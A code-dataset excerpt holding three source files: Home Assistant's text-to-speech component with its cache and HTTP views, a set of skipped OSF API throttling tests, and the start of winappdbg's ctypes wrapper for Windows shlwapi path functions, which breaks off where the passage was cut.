repo_name | path | copies | size | content | license |
|---|---|---|---|---|---|
molobrakos/home-assistant | homeassistant/components/tts/__init__.py | 5 | 18394 | """Provide functionality to TTS."""
import asyncio
import ctypes
import functools as ft
import hashlib
import io
import logging
import mimetypes
import os
import re
from aiohttp import web
import voluptuous as vol
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.media_player.const import (
ATTR_MEDIA_CONTENT_ID, ATTR_MEDIA_CONTENT_TYPE, MEDIA_TYPE_MUSIC,
SERVICE_PLAY_MEDIA)
from homeassistant.components.media_player.const import DOMAIN as DOMAIN_MP
from homeassistant.const import ATTR_ENTITY_ID, ENTITY_MATCH_ALL, CONF_PLATFORM
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_per_platform
import homeassistant.helpers.config_validation as cv
from homeassistant.setup import async_prepare_setup_platform
_LOGGER = logging.getLogger(__name__)
ATTR_CACHE = 'cache'
ATTR_LANGUAGE = 'language'
ATTR_MESSAGE = 'message'
ATTR_OPTIONS = 'options'
ATTR_PLATFORM = 'platform'
CONF_BASE_URL = 'base_url'
CONF_CACHE = 'cache'
CONF_CACHE_DIR = 'cache_dir'
CONF_LANG = 'language'
CONF_SERVICE_NAME = 'service_name'
CONF_TIME_MEMORY = 'time_memory'
DEFAULT_CACHE = True
DEFAULT_CACHE_DIR = 'tts'
DEFAULT_TIME_MEMORY = 300
DOMAIN = 'tts'
MEM_CACHE_FILENAME = 'filename'
MEM_CACHE_VOICE = 'voice'
SERVICE_CLEAR_CACHE = 'clear_cache'
SERVICE_SAY = 'say'
_RE_VOICE_FILE = re.compile(
r"([a-f0-9]{40})_([^_]+)_([^_]+)_([a-z_]+)\.[a-z0-9]{3,4}")
KEY_PATTERN = '{0}_{1}_{2}_{3}'
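# Illustration with hypothetical values: for a message whose SHA-1 digest is
# "42f18c03f3af5071e24e3bcf9a47bbca9e4f31ee", language "en", options key "-"
# and engine "demo", KEY_PATTERN yields the cache key
# "42f18c03f3af5071e24e3bcf9a47bbca9e4f31ee_en_-_demo", and the cached file
# "42f18c03f3af5071e24e3bcf9a47bbca9e4f31ee_en_-_demo.mp3" matches
# _RE_VOICE_FILE.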
def _deprecated_platform(value):
"""Validate if platform is deprecated."""
if value == 'google':
raise vol.Invalid(
'google tts service has been renamed to google_translate,'
' please update your configuration.')
return value
PLATFORM_SCHEMA = cv.PLATFORM_SCHEMA.extend({
vol.Required(CONF_PLATFORM): vol.All(cv.string, _deprecated_platform),
vol.Optional(CONF_CACHE, default=DEFAULT_CACHE): cv.boolean,
vol.Optional(CONF_CACHE_DIR, default=DEFAULT_CACHE_DIR): cv.string,
vol.Optional(CONF_TIME_MEMORY, default=DEFAULT_TIME_MEMORY):
vol.All(vol.Coerce(int), vol.Range(min=60, max=57600)),
vol.Optional(CONF_BASE_URL): cv.string,
vol.Optional(CONF_SERVICE_NAME): cv.string,
})
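# A configuration.yaml entry accepted by PLATFORM_SCHEMA looks like this
# (the platform name "demo" is illustrative):
#
#   tts:
#     - platform: demo
#       cache: true
#       cache_dir: /tmp/tts
#       time_memory: 300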
PLATFORM_SCHEMA_BASE = cv.PLATFORM_SCHEMA_BASE.extend(PLATFORM_SCHEMA.schema)
SCHEMA_SERVICE_SAY = vol.Schema({
vol.Required(ATTR_MESSAGE): cv.string,
vol.Optional(ATTR_CACHE): cv.boolean,
vol.Optional(ATTR_ENTITY_ID): cv.comp_entity_ids,
vol.Optional(ATTR_LANGUAGE): cv.string,
vol.Optional(ATTR_OPTIONS): dict,
})
SCHEMA_SERVICE_CLEAR_CACHE = vol.Schema({})
async def async_setup(hass, config):
"""Set up TTS."""
tts = SpeechManager(hass)
try:
conf = config[DOMAIN][0] if config.get(DOMAIN, []) else {}
use_cache = conf.get(CONF_CACHE, DEFAULT_CACHE)
cache_dir = conf.get(CONF_CACHE_DIR, DEFAULT_CACHE_DIR)
time_memory = conf.get(CONF_TIME_MEMORY, DEFAULT_TIME_MEMORY)
base_url = conf.get(CONF_BASE_URL) or hass.config.api.base_url
await tts.async_init_cache(use_cache, cache_dir, time_memory, base_url)
except (HomeAssistantError, KeyError) as err:
_LOGGER.error("Error on cache init %s", err)
return False
hass.http.register_view(TextToSpeechView(tts))
hass.http.register_view(TextToSpeechUrlView(tts))
async def async_setup_platform(p_type, p_config, disc_info=None):
"""Set up a TTS platform."""
platform = await async_prepare_setup_platform(
hass, config, DOMAIN, p_type)
if platform is None:
return
try:
if hasattr(platform, 'async_get_engine'):
provider = await platform.async_get_engine(
hass, p_config)
else:
provider = await hass.async_add_job(
platform.get_engine, hass, p_config)
if provider is None:
_LOGGER.error("Error setting up platform %s", p_type)
return
tts.async_register_engine(p_type, provider, p_config)
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Error setting up platform: %s", p_type)
return
async def async_say_handle(service):
"""Service handle for say."""
entity_ids = service.data.get(ATTR_ENTITY_ID, ENTITY_MATCH_ALL)
message = service.data.get(ATTR_MESSAGE)
cache = service.data.get(ATTR_CACHE)
language = service.data.get(ATTR_LANGUAGE)
options = service.data.get(ATTR_OPTIONS)
try:
url = await tts.async_get_url(
p_type, message, cache=cache, language=language,
options=options
)
except HomeAssistantError as err:
_LOGGER.error("Error on init TTS: %s", err)
return
data = {
ATTR_MEDIA_CONTENT_ID: url,
ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_MUSIC,
ATTR_ENTITY_ID: entity_ids,
}
await hass.services.async_call(
DOMAIN_MP, SERVICE_PLAY_MEDIA, data, blocking=True)
service_name = p_config.get(CONF_SERVICE_NAME, "{}_{}".format(
p_type, SERVICE_SAY))
hass.services.async_register(
DOMAIN, service_name, async_say_handle,
schema=SCHEMA_SERVICE_SAY)
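        # For a platform named "demo" this registers "tts.demo_say"; an
        # illustrative service call payload would be:
        #   {"entity_id": "media_player.living_room", "message": "Hello"}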
setup_tasks = [async_setup_platform(p_type, p_config) for p_type, p_config
in config_per_platform(config, DOMAIN)]
if setup_tasks:
await asyncio.wait(setup_tasks, loop=hass.loop)
async def async_clear_cache_handle(service):
"""Handle clear cache service call."""
await tts.async_clear_cache()
hass.services.async_register(
DOMAIN, SERVICE_CLEAR_CACHE, async_clear_cache_handle,
schema=SCHEMA_SERVICE_CLEAR_CACHE)
return True
class SpeechManager:
"""Representation of a speech store."""
def __init__(self, hass):
"""Initialize a speech store."""
self.hass = hass
self.providers = {}
self.use_cache = DEFAULT_CACHE
self.cache_dir = DEFAULT_CACHE_DIR
self.time_memory = DEFAULT_TIME_MEMORY
self.base_url = None
self.file_cache = {}
self.mem_cache = {}
async def async_init_cache(self, use_cache, cache_dir, time_memory,
base_url):
"""Init config folder and load file cache."""
self.use_cache = use_cache
self.time_memory = time_memory
self.base_url = base_url
def init_tts_cache_dir(cache_dir):
"""Init cache folder."""
if not os.path.isabs(cache_dir):
cache_dir = self.hass.config.path(cache_dir)
if not os.path.isdir(cache_dir):
_LOGGER.info("Create cache dir %s.", cache_dir)
os.mkdir(cache_dir)
return cache_dir
try:
self.cache_dir = await self.hass.async_add_job(
init_tts_cache_dir, cache_dir)
except OSError as err:
raise HomeAssistantError("Can't init cache dir {}".format(err))
def get_cache_files():
"""Return a dict of given engine files."""
cache = {}
folder_data = os.listdir(self.cache_dir)
for file_data in folder_data:
record = _RE_VOICE_FILE.match(file_data)
if record:
key = KEY_PATTERN.format(
record.group(1), record.group(2), record.group(3),
record.group(4)
)
cache[key.lower()] = file_data.lower()
return cache
try:
cache_files = await self.hass.async_add_job(get_cache_files)
except OSError as err:
raise HomeAssistantError("Can't read cache dir {}".format(err))
if cache_files:
self.file_cache.update(cache_files)
async def async_clear_cache(self):
"""Read file cache and delete files."""
self.mem_cache = {}
def remove_files():
"""Remove files from filesystem."""
for _, filename in self.file_cache.items():
try:
os.remove(os.path.join(self.cache_dir, filename))
except OSError as err:
_LOGGER.warning(
"Can't remove cache file '%s': %s", filename, err)
await self.hass.async_add_job(remove_files)
self.file_cache = {}
@callback
def async_register_engine(self, engine, provider, config):
"""Register a TTS provider."""
provider.hass = self.hass
if provider.name is None:
provider.name = engine
self.providers[engine] = provider
async def async_get_url(self, engine, message, cache=None, language=None,
options=None):
"""Get URL for play message.
This method is a coroutine.
"""
provider = self.providers[engine]
msg_hash = hashlib.sha1(bytes(message, 'utf-8')).hexdigest()
use_cache = cache if cache is not None else self.use_cache
# Languages
language = language or provider.default_language
if language is None or \
language not in provider.supported_languages:
raise HomeAssistantError("Not supported language {0}".format(
language))
# Options
if provider.default_options and options:
merged_options = provider.default_options.copy()
merged_options.update(options)
options = merged_options
options = options or provider.default_options
if options is not None:
invalid_opts = [opt_name for opt_name in options.keys()
if opt_name not in (provider.supported_options or
[])]
if invalid_opts:
raise HomeAssistantError(
"Invalid options found: {}".format(invalid_opts))
            # Hash the option names *and* values; frozenset(options) alone
            # would hash only the keys, so different option values would
            # collide on one cache key. c_size_t makes the hash unsigned.
            options_key = ctypes.c_size_t(
                hash(frozenset(options.items()))).value
else:
options_key = '-'
key = KEY_PATTERN.format(
msg_hash, language, options_key, engine).lower()
# Is speech already in memory
if key in self.mem_cache:
filename = self.mem_cache[key][MEM_CACHE_FILENAME]
# Is file store in file cache
elif use_cache and key in self.file_cache:
filename = self.file_cache[key]
self.hass.async_create_task(self.async_file_to_mem(key))
# Load speech from provider into memory
else:
filename = await self.async_get_tts_audio(
engine, key, message, use_cache, language, options)
return "{}/api/tts_proxy/{}".format(self.base_url, filename)
async def async_get_tts_audio(
self, engine, key, message, cache, language, options):
"""Receive TTS and store for view in cache.
This method is a coroutine.
"""
provider = self.providers[engine]
extension, data = await provider.async_get_tts_audio(
message, language, options)
if data is None or extension is None:
raise HomeAssistantError(
"No TTS from {} for '{}'".format(engine, message))
# Create file infos
filename = ("{}.{}".format(key, extension)).lower()
data = self.write_tags(
filename, data, provider, message, language, options)
# Save to memory
self._async_store_to_memcache(key, filename, data)
if cache:
self.hass.async_create_task(
self.async_save_tts_audio(key, filename, data))
return filename
async def async_save_tts_audio(self, key, filename, data):
"""Store voice data to file and file_cache.
This method is a coroutine.
"""
voice_file = os.path.join(self.cache_dir, filename)
def save_speech():
"""Store speech to filesystem."""
with open(voice_file, 'wb') as speech:
speech.write(data)
try:
await self.hass.async_add_job(save_speech)
self.file_cache[key] = filename
except OSError:
_LOGGER.error("Can't write %s", filename)
async def async_file_to_mem(self, key):
"""Load voice from file cache into memory.
This method is a coroutine.
"""
filename = self.file_cache.get(key)
if not filename:
raise HomeAssistantError("Key {} not in file cache!".format(key))
voice_file = os.path.join(self.cache_dir, filename)
def load_speech():
"""Load a speech from filesystem."""
with open(voice_file, 'rb') as speech:
return speech.read()
try:
data = await self.hass.async_add_job(load_speech)
except OSError:
del self.file_cache[key]
raise HomeAssistantError("Can't read {}".format(voice_file))
self._async_store_to_memcache(key, filename, data)
@callback
def _async_store_to_memcache(self, key, filename, data):
"""Store data to memcache and set timer to remove it."""
self.mem_cache[key] = {
MEM_CACHE_FILENAME: filename,
MEM_CACHE_VOICE: data,
}
@callback
def async_remove_from_mem():
"""Cleanup memcache."""
self.mem_cache.pop(key)
self.hass.loop.call_later(self.time_memory, async_remove_from_mem)
async def async_read_tts(self, filename):
"""Read a voice file and return binary.
This method is a coroutine.
"""
record = _RE_VOICE_FILE.match(filename.lower())
if not record:
raise HomeAssistantError("Wrong tts file format!")
key = KEY_PATTERN.format(
record.group(1), record.group(2), record.group(3), record.group(4))
if key not in self.mem_cache:
if key not in self.file_cache:
raise HomeAssistantError("{} not in cache!".format(key))
await self.async_file_to_mem(key)
content, _ = mimetypes.guess_type(filename)
return (content, self.mem_cache[key][MEM_CACHE_VOICE])
@staticmethod
def write_tags(filename, data, provider, message, language, options):
"""Write ID3 tags to file.
Async friendly.
"""
import mutagen
data_bytes = io.BytesIO(data)
data_bytes.name = filename
data_bytes.seek(0)
album = provider.name
artist = language
if options is not None:
if options.get('voice') is not None:
artist = options.get('voice')
try:
tts_file = mutagen.File(data_bytes, easy=True)
if tts_file is not None:
tts_file['artist'] = artist
tts_file['album'] = album
tts_file['title'] = message
tts_file.save(data_bytes)
except mutagen.MutagenError as err:
_LOGGER.error("ID3 tag error: %s", err)
return data_bytes.getvalue()
class Provider:
"""Represent a single TTS provider."""
hass = None
name = None
@property
def default_language(self):
"""Return the default language."""
return None
@property
def supported_languages(self):
"""Return a list of supported languages."""
return None
@property
def supported_options(self):
"""Return a list of supported options like voice, emotionen."""
return None
@property
def default_options(self):
"""Return a dict include default options."""
return None
def get_tts_audio(self, message, language, options=None):
"""Load tts audio file from provider."""
raise NotImplementedError()
def async_get_tts_audio(self, message, language, options=None):
"""Load tts audio file from provider.
Return a tuple of file extension and data as bytes.
This method must be run in the event loop and returns a coroutine.
"""
return self.hass.async_add_job(
ft.partial(self.get_tts_audio, message, language, options=options))
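# Illustrative sketch (not part of the original module): a minimal Provider
# implementation. A real platform module would expose get_engine or
# async_get_engine returning an instance; the canned WAV bytes are dummies.
class DemoProvider(Provider):
    """Example provider that returns canned audio bytes."""
    name = 'Demo'
    @property
    def default_language(self):
        """Return the default language."""
        return 'en'
    @property
    def supported_languages(self):
        """Return the list of supported languages."""
        return ['en']
    def get_tts_audio(self, message, language, options=None):
        """Return (extension, data); a real provider calls its engine here."""
        return 'wav', b'\x00\x00'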
class TextToSpeechUrlView(HomeAssistantView):
"""TTS view to get a url to a generated speech file."""
requires_auth = True
url = '/api/tts_get_url'
name = 'api:tts:geturl'
def __init__(self, tts):
"""Initialize a tts view."""
self.tts = tts
async def post(self, request):
"""Generate speech and provide url."""
try:
data = await request.json()
except ValueError:
return self.json_message('Invalid JSON specified', 400)
        if not data.get(ATTR_PLATFORM) or not data.get(ATTR_MESSAGE):
return self.json_message('Must specify platform and message', 400)
p_type = data[ATTR_PLATFORM]
message = data[ATTR_MESSAGE]
cache = data.get(ATTR_CACHE)
language = data.get(ATTR_LANGUAGE)
options = data.get(ATTR_OPTIONS)
try:
url = await self.tts.async_get_url(
p_type, message, cache=cache, language=language,
options=options
)
resp = self.json({'url': url}, 200)
except HomeAssistantError as err:
_LOGGER.error("Error on init tts: %s", err)
resp = self.json({'error': err}, 400)
return resp
class TextToSpeechView(HomeAssistantView):
"""TTS view to serve a speech audio."""
requires_auth = False
url = '/api/tts_proxy/{filename}'
name = 'api:tts:speech'
def __init__(self, tts):
"""Initialize a tts view."""
self.tts = tts
async def get(self, request, filename):
"""Start a get request."""
try:
content, data = await self.tts.async_read_tts(filename)
except HomeAssistantError as err:
_LOGGER.error("Error on load tts: %s", err)
return web.Response(status=404)
return web.Response(body=data, content_type=content)
| apache-2.0 |
pattisdr/osf.io | api_tests/base/test_throttling.py | 12 | 4553 | import pytest
import mock
from nose.tools import * # noqa:
from api.base.settings.defaults import API_BASE
from tests.base import ApiTestCase
from osf_tests.factories import AuthUserFactory, ProjectFactory
pytestmark = pytest.mark.skip(
'Unskip when throttling no longer fails on travis'
)
class TestDefaultThrottleClasses(ApiTestCase):
@mock.patch('api.base.throttling.BaseThrottle.get_ident')
def test_default_throttle_class_calls(self, mock_base):
base_url = '/{}nodes/'.format(API_BASE)
res = self.app.get(base_url)
assert_equal(res.status_code, 200)
assert_equal(mock_base.call_count, 2)
class TestRootThrottle(ApiTestCase):
def setUp(self):
super(TestRootThrottle, self).setUp()
self.url = '/{}'.format(API_BASE)
self.user = AuthUserFactory()
@mock.patch('api.base.throttling.RootAnonThrottle.allow_request')
def test_root_throttle_unauthenticated_request(self, mock_allow):
res = self.app.get(self.url)
assert_equal(res.status_code, 200)
assert_equal(mock_allow.call_count, 1)
@mock.patch('rest_framework.throttling.UserRateThrottle.allow_request')
def test_root_throttle_authenticated_request(self, mock_allow):
res = self.app.get(self.url, auth=self.user.auth)
assert_equal(res.status_code, 200)
assert_equal(mock_allow.call_count, 1)
class TestUserRateThrottle(ApiTestCase):
def setUp(self):
super(TestUserRateThrottle, self).setUp()
self.user = AuthUserFactory()
self.url = '/{}nodes/'.format(API_BASE)
@mock.patch('rest_framework.throttling.UserRateThrottle.allow_request')
def test_user_rate_allow_request_called(self, mock_allow):
res = self.app.get(self.url, auth=self.user.auth)
assert_equal(res.status_code, 200)
assert_equal(mock_allow.call_count, 1)
class TestNonCookieAuthThrottle(ApiTestCase):
def setUp(self):
super(TestNonCookieAuthThrottle, self).setUp()
self.url = '/{}nodes/'.format(API_BASE)
@mock.patch('api.base.throttling.NonCookieAuthThrottle.allow_request')
def test_cookie_throttle_rate_allow_request_called(self, mock_allow):
res = self.app.get(self.url)
assert_equal(res.status_code, 200)
assert_equal(mock_allow.call_count, 1)
class TestAddContributorEmailThrottle(ApiTestCase):
def setUp(self):
super(TestAddContributorEmailThrottle, self).setUp()
self.user = AuthUserFactory()
self.user_two = AuthUserFactory()
self.public_project = ProjectFactory(creator=self.user)
self.url = '/{}'.format(API_BASE)
self.public_url = '/{}nodes/{}/contributors/'.format(
API_BASE, self.public_project._id)
self.data_user_two = {
'data': {
'type': 'contributors',
'attributes': {
'bibliographic': True,
},
'relationships': {
'users': {
'data': {
'type': 'users',
'id': self.user_two._id,
}
}
}
}
}
@mock.patch('api.base.throttling.AddContributorThrottle.allow_request')
def test_add_contrib_throttle_rate_allow_request_not_called(
self, mock_allow):
res = self.app.get(self.url)
assert_equal(res.status_code, 200)
assert_equal(mock_allow.call_count, 0)
@mock.patch('api.base.throttling.AddContributorThrottle.allow_request')
def test_add_contrib_throttle_rate_allow_request_called(self, mock_allow):
res = self.app.post_json_api(
self.public_url,
self.data_user_two,
auth=self.user.auth)
assert_equal(res.status_code, 201)
assert_equal(mock_allow.call_count, 1)
@mock.patch('api.base.throttling.NonCookieAuthThrottle.allow_request')
@mock.patch('rest_framework.throttling.UserRateThrottle.allow_request')
@mock.patch('api.base.throttling.AddContributorThrottle.allow_request')
def test_add_contrib_throttle_rate_and_default_rates_called(
self, mock_contrib_allow, mock_user_allow, mock_anon_allow):
res = self.app.get(self.public_url, auth=self.user.auth)
assert_equal(res.status_code, 200)
assert_equal(mock_anon_allow.call_count, 1)
assert_equal(mock_user_allow.call_count, 1)
assert_equal(mock_contrib_allow.call_count, 1)
| apache-2.0 |
MER-GROUP/intellij-community | python/helpers/pydev/pydevd_attach_to_process/winappdbg/win32/shlwapi.py | 102 | 25807 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2014, Mario Vilas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Wrapper for shlwapi.dll in ctypes.
"""
__revision__ = "$Id$"
from winappdbg.win32.defines import *
from winappdbg.win32.kernel32 import *
#==============================================================================
# This is used later on to calculate the list of exported symbols.
_all = None
_all = set(vars().keys())
#==============================================================================
OS_WINDOWS = 0
OS_NT = 1
OS_WIN95ORGREATER = 2
OS_NT4ORGREATER = 3
OS_WIN98ORGREATER = 5
OS_WIN98_GOLD = 6
OS_WIN2000ORGREATER = 7
OS_WIN2000PRO = 8
OS_WIN2000SERVER = 9
OS_WIN2000ADVSERVER = 10
OS_WIN2000DATACENTER = 11
OS_WIN2000TERMINAL = 12
OS_EMBEDDED = 13
OS_TERMINALCLIENT = 14
OS_TERMINALREMOTEADMIN = 15
OS_WIN95_GOLD = 16
OS_MEORGREATER = 17
OS_XPORGREATER = 18
OS_HOME = 19
OS_PROFESSIONAL = 20
OS_DATACENTER = 21
OS_ADVSERVER = 22
OS_SERVER = 23
OS_TERMINALSERVER = 24
OS_PERSONALTERMINALSERVER = 25
OS_FASTUSERSWITCHING = 26
OS_WELCOMELOGONUI = 27
OS_DOMAINMEMBER = 28
OS_ANYSERVER = 29
OS_WOW6432 = 30
OS_WEBSERVER = 31
OS_SMALLBUSINESSSERVER = 32
OS_TABLETPC = 33
OS_SERVERADMINUI = 34
OS_MEDIACENTER = 35
OS_APPLIANCE = 36
#--- shlwapi.dll --------------------------------------------------------------
# BOOL IsOS(
# DWORD dwOS
# );
def IsOS(dwOS):
try:
_IsOS = windll.shlwapi.IsOS
_IsOS.argtypes = [DWORD]
_IsOS.restype = bool
except AttributeError:
# According to MSDN, on Windows versions prior to Vista
# this function is exported only by ordinal number 437.
# http://msdn.microsoft.com/en-us/library/bb773795%28VS.85%29.aspx
_GetProcAddress = windll.kernel32.GetProcAddress
_GetProcAddress.argtypes = [HINSTANCE, DWORD]
_GetProcAddress.restype = LPVOID
_IsOS = windll.kernel32.GetProcAddress(windll.shlwapi._handle, 437)
_IsOS = WINFUNCTYPE(bool, DWORD)(_IsOS)
return _IsOS(dwOS)
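# Illustrative usage (the result depends on the running Windows version):
#   if IsOS(OS_NT):
#       print "running on an NT-based Windows"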
# LPTSTR PathAddBackslash(
# LPTSTR lpszPath
# );
def PathAddBackslashA(lpszPath):
_PathAddBackslashA = windll.shlwapi.PathAddBackslashA
_PathAddBackslashA.argtypes = [LPSTR]
_PathAddBackslashA.restype = LPSTR
lpszPath = ctypes.create_string_buffer(lpszPath, MAX_PATH)
retval = _PathAddBackslashA(lpszPath)
if retval == NULL:
raise ctypes.WinError()
return lpszPath.value
def PathAddBackslashW(lpszPath):
_PathAddBackslashW = windll.shlwapi.PathAddBackslashW
_PathAddBackslashW.argtypes = [LPWSTR]
_PathAddBackslashW.restype = LPWSTR
lpszPath = ctypes.create_unicode_buffer(lpszPath, MAX_PATH)
retval = _PathAddBackslashW(lpszPath)
if retval == NULL:
raise ctypes.WinError()
return lpszPath.value
PathAddBackslash = GuessStringType(PathAddBackslashA, PathAddBackslashW)
# BOOL PathAddExtension(
# LPTSTR pszPath,
# LPCTSTR pszExtension
# );
def PathAddExtensionA(lpszPath, pszExtension = None):
_PathAddExtensionA = windll.shlwapi.PathAddExtensionA
_PathAddExtensionA.argtypes = [LPSTR, LPSTR]
_PathAddExtensionA.restype = bool
_PathAddExtensionA.errcheck = RaiseIfZero
if not pszExtension:
pszExtension = None
lpszPath = ctypes.create_string_buffer(lpszPath, MAX_PATH)
_PathAddExtensionA(lpszPath, pszExtension)
return lpszPath.value
def PathAddExtensionW(lpszPath, pszExtension = None):
_PathAddExtensionW = windll.shlwapi.PathAddExtensionW
_PathAddExtensionW.argtypes = [LPWSTR, LPWSTR]
_PathAddExtensionW.restype = bool
_PathAddExtensionW.errcheck = RaiseIfZero
if not pszExtension:
pszExtension = None
lpszPath = ctypes.create_unicode_buffer(lpszPath, MAX_PATH)
_PathAddExtensionW(lpszPath, pszExtension)
return lpszPath.value
PathAddExtension = GuessStringType(PathAddExtensionA, PathAddExtensionW)
# BOOL PathAppend(
# LPTSTR pszPath,
# LPCTSTR pszMore
# );
def PathAppendA(lpszPath, pszMore = None):
_PathAppendA = windll.shlwapi.PathAppendA
_PathAppendA.argtypes = [LPSTR, LPSTR]
_PathAppendA.restype = bool
_PathAppendA.errcheck = RaiseIfZero
if not pszMore:
pszMore = None
lpszPath = ctypes.create_string_buffer(lpszPath, MAX_PATH)
_PathAppendA(lpszPath, pszMore)
return lpszPath.value
def PathAppendW(lpszPath, pszMore = None):
_PathAppendW = windll.shlwapi.PathAppendW
_PathAppendW.argtypes = [LPWSTR, LPWSTR]
_PathAppendW.restype = bool
_PathAppendW.errcheck = RaiseIfZero
if not pszMore:
pszMore = None
lpszPath = ctypes.create_unicode_buffer(lpszPath, MAX_PATH)
_PathAppendW(lpszPath, pszMore)
return lpszPath.value
PathAppend = GuessStringType(PathAppendA, PathAppendW)
# LPTSTR PathCombine(
# LPTSTR lpszDest,
# LPCTSTR lpszDir,
# LPCTSTR lpszFile
# );
def PathCombineA(lpszDir, lpszFile):
_PathCombineA = windll.shlwapi.PathCombineA
_PathCombineA.argtypes = [LPSTR, LPSTR, LPSTR]
_PathCombineA.restype = LPSTR
lpszDest = ctypes.create_string_buffer("", max(MAX_PATH, len(lpszDir) + len(lpszFile) + 1))
retval = _PathCombineA(lpszDest, lpszDir, lpszFile)
if retval == NULL:
return None
return lpszDest.value
def PathCombineW(lpszDir, lpszFile):
_PathCombineW = windll.shlwapi.PathCombineW
_PathCombineW.argtypes = [LPWSTR, LPWSTR, LPWSTR]
_PathCombineW.restype = LPWSTR
lpszDest = ctypes.create_unicode_buffer(u"", max(MAX_PATH, len(lpszDir) + len(lpszFile) + 1))
retval = _PathCombineW(lpszDest, lpszDir, lpszFile)
if retval == NULL:
return None
return lpszDest.value
PathCombine = GuessStringType(PathCombineA, PathCombineW)
# BOOL PathCanonicalize(
# LPTSTR lpszDst,
# LPCTSTR lpszSrc
# );
def PathCanonicalizeA(lpszSrc):
_PathCanonicalizeA = windll.shlwapi.PathCanonicalizeA
_PathCanonicalizeA.argtypes = [LPSTR, LPSTR]
_PathCanonicalizeA.restype = bool
_PathCanonicalizeA.errcheck = RaiseIfZero
lpszDst = ctypes.create_string_buffer("", MAX_PATH)
_PathCanonicalizeA(lpszDst, lpszSrc)
return lpszDst.value
def PathCanonicalizeW(lpszSrc):
_PathCanonicalizeW = windll.shlwapi.PathCanonicalizeW
_PathCanonicalizeW.argtypes = [LPWSTR, LPWSTR]
_PathCanonicalizeW.restype = bool
_PathCanonicalizeW.errcheck = RaiseIfZero
lpszDst = ctypes.create_unicode_buffer(u"", MAX_PATH)
_PathCanonicalizeW(lpszDst, lpszSrc)
return lpszDst.value
PathCanonicalize = GuessStringType(PathCanonicalizeA, PathCanonicalizeW)
# BOOL PathRelativePathTo(
# _Out_ LPTSTR pszPath,
# _In_ LPCTSTR pszFrom,
# _In_ DWORD dwAttrFrom,
# _In_ LPCTSTR pszTo,
# _In_ DWORD dwAttrTo
# );
def PathRelativePathToA(pszFrom = None, dwAttrFrom = FILE_ATTRIBUTE_DIRECTORY, pszTo = None, dwAttrTo = FILE_ATTRIBUTE_DIRECTORY):
_PathRelativePathToA = windll.shlwapi.PathRelativePathToA
_PathRelativePathToA.argtypes = [LPSTR, LPSTR, DWORD, LPSTR, DWORD]
_PathRelativePathToA.restype = bool
_PathRelativePathToA.errcheck = RaiseIfZero
# Make the paths absolute or the function fails.
if pszFrom:
pszFrom = GetFullPathNameA(pszFrom)[0]
else:
pszFrom = GetCurrentDirectoryA()
if pszTo:
pszTo = GetFullPathNameA(pszTo)[0]
else:
pszTo = GetCurrentDirectoryA()
# Argh, this function doesn't receive an output buffer size!
# We'll try to guess the maximum possible buffer size.
dwPath = max((len(pszFrom) + len(pszTo)) * 2 + 1, MAX_PATH + 1)
pszPath = ctypes.create_string_buffer('', dwPath)
# Also, it doesn't set the last error value.
# Whoever coded it must have been drunk or tripping on acid. Or both.
# The only failure conditions I've seen were invalid paths, paths not
# on the same drive, or the path is not absolute.
SetLastError(ERROR_INVALID_PARAMETER)
_PathRelativePathToA(pszPath, pszFrom, dwAttrFrom, pszTo, dwAttrTo)
return pszPath.value
def PathRelativePathToW(pszFrom = None, dwAttrFrom = FILE_ATTRIBUTE_DIRECTORY, pszTo = None, dwAttrTo = FILE_ATTRIBUTE_DIRECTORY):
_PathRelativePathToW = windll.shlwapi.PathRelativePathToW
_PathRelativePathToW.argtypes = [LPWSTR, LPWSTR, DWORD, LPWSTR, DWORD]
_PathRelativePathToW.restype = bool
_PathRelativePathToW.errcheck = RaiseIfZero
# Refer to PathRelativePathToA to know why this code is so ugly.
if pszFrom:
pszFrom = GetFullPathNameW(pszFrom)[0]
else:
pszFrom = GetCurrentDirectoryW()
if pszTo:
pszTo = GetFullPathNameW(pszTo)[0]
else:
pszTo = GetCurrentDirectoryW()
dwPath = max((len(pszFrom) + len(pszTo)) * 2 + 1, MAX_PATH + 1)
pszPath = ctypes.create_unicode_buffer(u'', dwPath)
SetLastError(ERROR_INVALID_PARAMETER)
_PathRelativePathToW(pszPath, pszFrom, dwAttrFrom, pszTo, dwAttrTo)
return pszPath.value
PathRelativePathTo = GuessStringType(PathRelativePathToA, PathRelativePathToW)
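# Illustrative usage with hypothetical paths:
#   PathRelativePathTo(pszFrom="C:\\projects\\app",
#                      pszTo="C:\\projects\\lib\\x.dll")
#   returns something like "..\\lib\\x.dll"; both paths must be absolute
#   and on the same drive, otherwise RaiseIfZero raises WindowsError.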
# BOOL PathFileExists(
# LPCTSTR pszPath
# );
def PathFileExistsA(pszPath):
_PathFileExistsA = windll.shlwapi.PathFileExistsA
_PathFileExistsA.argtypes = [LPSTR]
_PathFileExistsA.restype = bool
return _PathFileExistsA(pszPath)
def PathFileExistsW(pszPath):
